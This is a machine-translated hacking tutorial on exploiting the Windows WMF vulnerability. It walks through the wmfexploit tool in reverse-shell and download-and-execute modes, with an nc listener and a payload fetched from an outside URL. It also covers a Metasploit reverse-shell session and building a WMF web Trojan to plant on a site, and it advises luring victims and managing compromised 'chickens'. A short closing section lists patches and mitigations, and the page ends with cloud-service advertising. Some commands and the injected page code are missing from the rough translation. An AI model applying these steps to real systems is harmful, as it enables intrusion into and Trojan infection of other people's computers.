Because the WMF vulnerability involves a large number of Windows system versions, including all system versions from Windows 98 to Windows 2003, the compromise is significant. There are two main types of attacks currently exploiting WMF vulnerabilities: 1. Overflow attack 2. Exploit the vulnerability made by the Web Trojan. The former allows hackers to get the highest privileges on the system, while the latter can turn the victim's computer into a hacker's broiler. Let's take a look at how the hacker exploits the WMF vulnerability.
I. Using a dedicated overflow tool
The overflow tool for WMF vulnerabilities appeared on the Web a few days after the vulnerability was released, although the announcement was early and flawed, but it was still easy to overflow the vulnerable host. This overflow tool is called wmfexploit. After downloading it to the C disk (because the overflow program will be antivirus software is considered a virus, so the test needs to be anti-virus software shutdown), point "start" → "Run", enter "CMD" Run "Command prompt." Enter the C disk in the command prompt, and you can view its usage instructions after you enter Wmfexploit. There are two kinds of overflow modes: 1. Reverse overflow 2. Active download execution type.
1. Reverse overflow, penetrate the firewall
The biggest advantage of reverse overflow is that it can penetrate the firewall. At the same time because of the specificity of the WMF vulnerability, we can not through the vulnerability scanner to determine which host vulnerabilities, so the use of a reverse connection, so that the vulnerable host to actively connect the local.
After you run Wmfexploit in the command prompt, you can view a description of its reverse overflow usage. The use of the method is as follows: Wmfexploit 1 . Where the number 1 represents an overflow mode for a reverse connection, " " represents the IP address and port of this computer, which is used to open a Web service on this computer so that the target can access the native malicious WMF file, causing the overflow. The last " " is the reverse overflow of the IP address and port that is listening when the shell is returned. Here for example "Wmfexploit 1 192.168.0.1 777 192.168.0.1 888". After you set the return, the overflow program will display the binding success!
Figure 1. Setting up a reverse connection successfully
Once the setup is complete, we go to the command prompt, then run the famous Network tool NC and enter the following command "Nc-vv-l-P 888" so that the NC starts listening on the 888 port on this computer. Then we can lure the target to visit our malicious WMF file. Send the URL "http://192.168.0.1:777/any.wmf" to each other. When the target opens this address, it runs the WMF file that we bundled with the overflow information. We go back to the Windows Listening window, we can see that the target host has successfully overflowed.
Figure 2. Get a shell after overflow
Tip: The IP address mentioned above is 192.168.0.1, which belongs to intranet IP, only for the convenience of the test, if you want to test the host of the external network, you need to change the local intranet IP to extranet IP.
2. Download execution, direct running Trojan
In addition to the reverse overflow, Wmfexploit also has an overflow mode of downloading the execution. When the target host runs a malicious WMF file overflow, the shell will not be sent to the local listening port, but directly from the designated URL to download an EXE file run, this file can be a trojan, can also be other programs. Of course, we also need to have a web space, used to place the EXE file that needs to be executed.
To see how the download execution overflow is used: Wmfexploit 2 . The number 2 means to change the overflow mode to download execution, and finally to represent the URL of the exe file. For example, "Wmfexploit 2 192.168.0.1 777 Http://www.***.com/123.exe". After the setup is complete, we do not need to use NC for listening, just send the URL "http://192.168.0.1:777/any.wmf".
Two. Using a graphical overflow test system
Metasploit is a well-known overflow testing system, almost all the current overflow vulnerability testing, can be said to be the integration of all overflow programs. Of course, it is not simple to stack the overflow program together, but provides a convenient operation, targeted overflow test platform. The biggest advantage of this test system is the use of a fully graphical interface, which is convenient for the rookie to overflow test.
Download and install Metasploit. Click "Start" when finished, run "Msfupdate" in the program group, the program will pop up a "command Prompt" window, display the list of files that need to be updated, and enter "Yes" to return to the overflow program update. After the update is completed, run "Msfweb" to turn on the Metasploi browsing service of this machine. Then open the browser, enter "http://127.0.0.1:55555" in the Address bar, you can open the Metasploi operating interface. Select the "Windows xp/2003/vista Metafile Escape () setabortproc Code Execution" in the overflow list to enter the vulnerability information interface and click on the bottom "0-automatic-windows XP /Windows 2003/windows Vista (default) to test and select "Win32_reverse" in the Next "Select Payload:" option. Finally come to overflow related information filling place, in the option only need to set "Httphost", "Httpport", "Lhost", "Lport" four items can be, others remain the default. The Set method and principle is similar to Wmfexploit, which is no longer elaborated here.
Figure 3. Fill in the overflow information in the Metasploit
Also the malicious WMF file address to the target, when the other side overflow, we click into the Metasploit interface of "SESSIONS" can get an administrator rights shell.
Tip: Be sure to update before using Metasploi, or you will probably not have the test options associated with the WMF vulnerability.
Three. Use the loophole to make the webpage Trojan
The biggest impact of the WMF vulnerability is the Web page Trojan flying, because the antivirus software on the image file detection function is not strong enough, so the use of WMF vulnerabilities made by the Web Trojan is easy to succeed, has become the most recent web Trojan protagonist. Let's take a look at the production of WMF Web Trojans.
First we need to prepare a Trojan horse program, here is recommended similar to the gray pigeon bounce-linked Trojan, so when there is a target overflow will be through the Trojan active connection to our host, without our active connection, convenient for the management of chickens. Then the configured Trojan server is placed on the Web page space (you can apply for free space for storage).
Download WMF Trojan's production program ms0601. When the download is complete, run in the command prompt, you can see that the method is simple: ms0601 [the URL of Exefile], directly enter the address of the Trojan file. Enter after the same directory can generate a exploit.wmf file, run this WMF file will trigger overflow and automatically download the Trojan file from the Web execution.
Upload the Exploit.wmf file to the Web page space. Finally, we need to insert the following code in the source page of the website:. This way, when someone accesses the home page, it will not pop up a new browser window, but instead run exploit.wmf directly to overflow.
Four. Fill in loophole, prevent Trojan
Because of the late release of the WMF vulnerability, there are many systems on the network that are not patched. Whether the overflow or the Web Trojan, the success rate is very high, which also gives the virus and Trojan transmission provides a way. After understanding how hackers exploit the WMF vulnerability, let's take a look at how we can fill a vulnerability and guard against Trojans that exploit WMF vulnerabilities.
1. Anti-Registration DLL file
The overflow is triggered when you need to view a malicious WMF file using Windows Picture, so if you are not ready to play a system patch, you can first attempt to reverse register the Windows Picture DLL file Shimgvw.dll, and after the registration windows The picture will no longer run and the overflow will not exist.
The reverse registration method is: Point "start" → "Run", enter "Regsvr32-u%windir%/system32/shimgvw.dll" can. If you want to restore the use of Windows picture, you can enter "regsvr32%windir%/system32/shimgvw.dll" to re-register.
Figure 4. Anti-registration Shimgvw.dll
2. Use a bug patch
At present, Microsoft has released the patch of the vulnerability, download address: http://www.microsoft.com/technet/security/Bulletin/MS06-001.mspx, this is the most thorough and safest way to repair.
If you are not ready to play Microsoft's system patch, you can recommend a third-party-made patch:
3. Beware of unknown picture files
If a malicious WMF file is placed in a Web page space, we will have a different situation when accessing this malicious WMF file, Win2000 mainly as a download prompt box to download the WMF file. WinXP and Win2003 pop up Windows Picture Viewer, and the contents of the picture are not displayed. In this case, we should be careful, it is possible that the WMF file with overflow information. Of course not only the WMF is the suffix of the picture file can trigger overflow, other such as JPG, BMP and other picture formats as long as the structure, can also overflow. So we have to be more careful with the unknown pictures, hackers will often take a malicious image file to get a tempting name, luring others to open.
Figure 5 Performance when opening a malicious WMF file
In addition, upgrading anti-virus software is necessary, the latest anti-virus software virus Library has the malicious WMF files listed as a virus.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
